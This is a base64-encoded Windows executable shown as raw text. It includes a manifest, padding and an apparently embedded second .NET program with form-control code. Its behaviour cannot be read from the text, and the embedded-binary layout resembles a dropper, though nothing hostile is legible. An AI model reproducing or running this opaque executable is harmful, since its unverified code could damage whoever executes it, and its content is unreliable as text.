AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQICAgICAgICAgICAgICAgIDAwMDAwMDAwAAAAAAAAAAI1VAAAAAAAACAAAAUOdAAAgAAAAk50AACQAAAPjmQAAKAAAAYOZAABAAAAA05kAAEQAAAATmQAASAAAA4OVAABMAAAC05UAAGAAAAHzlQAAZAAAAVOVAABoAAAAc5UAAGwAAAOTkQAAcAAAAvORAAB4AAACc5EAAHwAAADjkQAAgAAAAAORAACEAAAAI40AAIgAAAGjiQAB4AAAAWOJAAHkAAABI4kAAegAAADjiQAD8AAAANOJAAP8AAAAk4kAAAwAAAAcAAAB4AAAACgAAAP////+ACgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD//////////xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQAAAAAAAAICAgICAgICAgICAgICAgICAgICAgICAgICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABhYmNkZWZnaGlqa2xtbm9wcXJzdHV2d3h5egAAAAAAAEFCQ0RFRkdISUpLTE1OT1BRUlNUVVZXWFlaAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQEBAQAAAAAAAAICAgICAgICAgICAgICAgICAgICAgICAgICAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYWJjZGVmZ2hpamtsbW5vcHFyc3R1dnd4eXoAAAAAAABBQkNERUZHSElKS0xNTk9QUVJTVFVWV1hZWgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgFkEAAQIECKQDAABggnmCIQAAAAAAAACm3wAAAAAAAKGlAAAAAAAAgZ/g/AAAAABAfoD8AAAAAKgDAADBo9qjIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgf4AAAAAAABA/gAAAAAAALUDAADBo9qjIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgf4AAAAAAABB/gAAAAAAALYDAADPouSiGgDlouiiWwAAAAAAAAAAAAAAAAAAAAAAgf4AAAAAAABAfqH+AAAAAFEFAABR2l7aIABf2mraMgAAAAAAAAAAAAAAAAAAAAAAgdPY3uD5AAAxfoH+AAAAADTtQAD+////QwAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAASBtBAAAAAAAAAAAAAAAAAEgbQQAAAAAAAAAAAAAAAABIG0EAAAAAAAAAAAAAAAAASBtBAAAAAAAAAAAAAAAAAEgbQQAAAAAAAAAAAAAAAAABAAAAAQAAAAAAAAAAAAAAAAAAAHgeQQAAAAAAAAAAADDrQAC470AAOPFAALgdQQBQG0EAAQAAAFAbQQAgFkEAWOlAAEjpQAAtvEAALbxAAC28QAAtvEAALbxAAC28QAAtvEAALbxAAC28QAAtvEAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgBZMZAAAAAAAAAAAAAAAAAgAAAAAAAAAAAAAAAAAAADDrQAAy7UAAYPNAAFzzQABY80AAVPNAAFDzQABM80AASPNAAEDzQAA480AAMPNAACTzQAAY80AAEPNAAATzQAAA80AA/PJAAPjyQAD08kAA8PJAAOzyQADo8kAA5PJAAODyQADc8kAA2PJAANTyQADM8kAAwPJAALjyQACw8kAA8PJAAKjyQACg8kAAmPJAAIzyQACE8kAAePJAAGzyQABo8kAAZPJAAFjyQABE8kAAOPJAAAkEAAABAAAAAAAAALgdQQAuAAAAdB5BAJQqQQCUKkEAlCpBAJQqQQCUKkEAlCpBAJQqQQCUKkEAlCpBAH9/f39/f39/eB5BAAEAAAAuAAAAAQAAAAAAAAAAAAAA/v////7///8AAAAAAAAAAAMAAAAAAAAAAAAAAAAAAACAcAAAAQAAAPDx//8AAAAAUFNUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBEVAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADwHkEAMB9BAP////8AAAAAAAAAAP////8AAAAAAAAAAP////8eAAAAOwAAAFoAAAB4AAAAlwAAALUAAADUAAAA8wAAABEBAAAwAQAATgEAAG0BAAD/////HgAAADoAAABZAAAAdwAAAJYAAAC0AAAA0wAAAPIAAAAQAQAALwEAAE0BAABsAQAAAAAAAAAAAAAAAAAAAAAAAAQAAAAAAAEAGAAAABgAAIAAAAAAAAAAAAQAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAQAAAAAAAEACQQAAEgAAABYQAEAWgEAAOQEAAAAAAAAPGFzc2VtYmx5IHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MSIgbWFuaWZlc3RWZXJzaW9uPSIxLjAiPg0KICA8dHJ1c3RJbmZvIHhtbG5zPSJ1cm46c2NoZW1hcy1taWNyb3NvZnQtY29tOmFzbS52MyI+DQogICAgPHNlY3VyaXR5Pg0KICAgICAgPHJlcXVlc3RlZFByaXZpbGVnZXM+DQogICAgICAgIDxyZXF1ZXN0ZWRFeGVjdXRpb25MZXZlbCBsZXZlbD0iYXNJbnZva2VyIiB1aUFjY2Vzcz0iZmFsc2UiPjwvcmVxdWVzdGVkRXhlY3V0aW9uTGV2ZWw+DQogICAgICA8L3JlcXVlc3RlZFByaXZpbGVnZXM+DQogICAgPC9zZWN1cml0eT4NCiAgPC90cnVzdEluZm8+DQo8L2Fzc2VtYmx5PlBBUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRERJTkdQQURESU5HWFhQQURESU5HUEFERElOR1hYUEFERElOR1BBRERJTkdYWFBBRAAQAACcAAAACjBLMIwwXjFqMXsxjjGTMZoxwjHdMewxDjInMlYycTKAMqEyyDLkMk4zgzOpM7QzuTPAM+Yz8zP+MwM0CjQtNEc0YjRxNI40rjTJNNg0DzUUNRw1CTYpNlc2hjbINtY26DYDNxI3MTc2Nz43XTdiN2o3kTevN7o3vzfGN+o3/DcCOEk4TjhWOKc4wjjXOlw7ejxxPwAgAADAAAAAhjF/MgIzDDMvM1QzaDN6M4EzhzOZM6EzrDMBNAs0WjTkNOo08DT2NPw0AjUJNRA1FzUeNSU1LDUzNTs1QzVLNVc1YDVlNWs1dTV+NYk1lTWaNao1rzW1Nbs10TXYNec1+TXLNtU24jb9NgQ3HDdIN2Q3hzeaN2k5cDnzOfs5EDobOpo74D3nPfk9/z0ZPig+NT5BPlE+WD5nPnM+gD6kPrY+xD7ZPuM+CT88P0s/VD94P6c/tj8AAAAwAABoAAAAdjGtMcwx6zFBMmQyhjKRMscy1zIEMwwzKzM7M00zUjOdM7ozEjTsNPQ0DDUkNXs1oTWtNbk2EDcdNz03VzeLN7o3FTk4OUM5Zjm1OX468zpRPGc8/TwzPbw+dD9+PwAAAEAAAKAAAAAyMEEwuDDFMJ0xpzFFMoIytjLlMiA0ijTvNKM1wzWzNtw2NTfDOKM5bDqdOrM69DoTO7A75DsTPLo87zwIPQ89Fz0cPSA9JD1NPXM9kT2YPZw9oD2kPag9rD2wPbQ9/j0EPgg+DD4QPnY+gT6cPqM+qD6sPrA+0T77Pi0/ND84Pzw/QD9EP0g/TD9QP5o/oD+kP6g/rD/4PwBQAAAEAQAACjBZMF8wcDCaMNcw4TD5MCIxVjGFMWAyZjJ7MoQysTLMMtIy2zLiMgQzYzNrM34ziTOOM54zqDOvM7ozwzPZM+Qz/jMKNBI0IjQ3NHc0hDSuNLM0vjTDNOE0kjWfNbw18zULNhY2OjZDNko2UzaTNpg2wDblNgo3HTc1N0c3azelNx44JDg9OEM46zj2ODU5cjmBOdM53jnoOfk5BDpvO3s7gTuGO4w79jv9OxI8TTxmPG08gTyiPKg82jwxPTk9eT2DPas9xD0FPjU+Rz6ZPp8+wj7HPug+7T4SPxg/Iz8vP0Q/Sz9fP2Y/jT+TP54/qj+/P8Y/2j/hP/k/AGAAACQBAAAFMAswFzAmMCwwNTBBME8wVTBhMGcwdDB+MIUwnTCsMLMwwDDjMPgwHjFeMWQxjjGUMbAxyDHuMWgyizKVMs0y1TIfMyYzQTNGM04zVDNbM2EzaDNuM3YzfTOCM4ozkzOfM6QzqTOvM7MzuTO+M8QzyTPYM+4z+TP+Mwk0DjQZNB40KzQ5ND80TDRsNHI0jjS+NMM00TTgNAM1EDUcNSQ1LDU4NVw1ZDVvNbk1xjXfNf01OzZqNho3gTeuNyI4Xzh2OOk5+jk0OkE6SzpZOmI6bDqgOqs6tTrOOtg66zoPO0Y7ezuOO/47GzxjPM887jxjPW89gj2UPa89tz2/PdY97z0LPhQ+Gj4jPig+Nz5ePoc+mD67PoA/qj/1PwBwAABQAAAAQTCQMNgwPjFVMWYxojHRMfIxFDJdMqYyVzOKM5MznzPWM98z6zMkNC00OTRQNFs0ljUENis3Jzg/OGM4czu3PDo+aj6QPgAAAIAAAHQAAAB4MJ8yozKnMqsyrzKzMrcyuzLENGc1iDWUNbs1yDXNNds1CjYRNhs2RTZTNlk2fDaDNpw2sDa2Nr820jb2Nos3qzdDOcM5LjpBOl06bzqCOpQ61Dr0Otc9+T0xPlo+dz6CPpk+vj7VPoo/AAAAkAAAoAAAALMwVzFgMXUxpTFYMl0ybzKNMqEypzIcM4EzjTMFNB80KDRXNGo0ezSgNNs06zQGNSY1fDWNNcg15DU/Nko2eDaGNo82zzbhNkM3UDd4N6o3sjfwNyk4VTh9OLQ4vjjwOaU6tTrDOss62Dr2OgA7CTsUOyk7MDs2O0w7ZzscPSE9Zz91P3s/lT+aP6k/sj+/P8o/3D/vP/o/AKAAAMgAAAAAMAYwCzAUMDEwNzBCMEcwTzBVMF8wZjB6MIEwhzCVMJwwoTCqMLcwvTDXMOgw7jD/MGQxADUMNT81ZTWfNeQ1tzfCN8o33zcWOCE4MTg8OLY4zzj4OP04FDltOXI5dzl8OYw5uznJORA6FTpaOl86ZjprOnI6dzrmOu869Tp/O447nTuqO+E77zv1OwU8CjwiPCg8Nzw9PEw8UjxgPGk8eDx9PIc8lTzVPPI8Dz3fPuY+7D7DP9U/4j/uP/g/AAAAsAAAeAAAAAAwCzA7MGswAjGyMdUxUzIkM6wztjPOM9Uz3zPnM/Qz+zMrNMQ0OTVGN1g3ajeMN543sDfCN9Q35jf4Nzo6QTrFO+M7OTxLPJs8oTzBPPg8CT1SPa49wz0JPg8+Gz5wPqM+2z5GP0w/nT+jP8c/6j8AwAAAtAAAAB4wJDAwMHcwszAxMTgxtDG7MRYyQzKRMmYzNTQ7NEA0RjRNNF80qjTfNPg0/zQHNQw1EDUUNT01YzWBNYg1jDWQNZQ1mDWcNaA1pDXuNfQ1+DX8NQA2ZjZxNow2kzaYNpw2oDbBNus2HTckNyg3LDcwNzQ3ODc8N0A3ijeQN5Q3mDecN/E3/DcfOOM48Dj/ODc5ejmAOag5xTnxOSo6NzoWOyU7JD4rPoA+AAAA0AAADAAAAJAwAAAA4AAAHAAAAGQxaDFsMXAxdDGAMYQxvDHAMQAAAPAAAHAAAAAEOQg5qDnIOeg5CDooOkQ6SDpQOlQ6cDqQOrA6vDrYOvg6GDs4O1g7dDt4O5g7pDvAO8w76DsIPCg8SDxoPIg8qDzEPMg85DzoPAg9KD00PVA9bD1wPYw9kD2wPdA98D0QPjA+UD4AAAAQAQDoAAAAgDGIMQA1DDUUNRw1JDUsNTQ1PDVENUw1VDVcNWQ1bDV0NXw1hDWMNZQ1nDWkNaw1tDW8NUg6QDuoO7g7yDvYO+g7DDwYPBw8IDwkPCg8MDw0PDg8PDxAPEQ8SDxMPFA8VDxYPFw8YDxkPLA9tD24Pbw9wD3EPcg9zD3QPdQ92D3cPeA95D3oPew98D30Pfg9/D0APgQ+CD4MPhA+FD4YPhw+ID4kPig+LD4wPjQ+OD48PkA+RD5IPkw+UD5UPlg+XD5gPnA+eD58PoA+hD6IPow+kD6UPpg+nD6oPnA/dD8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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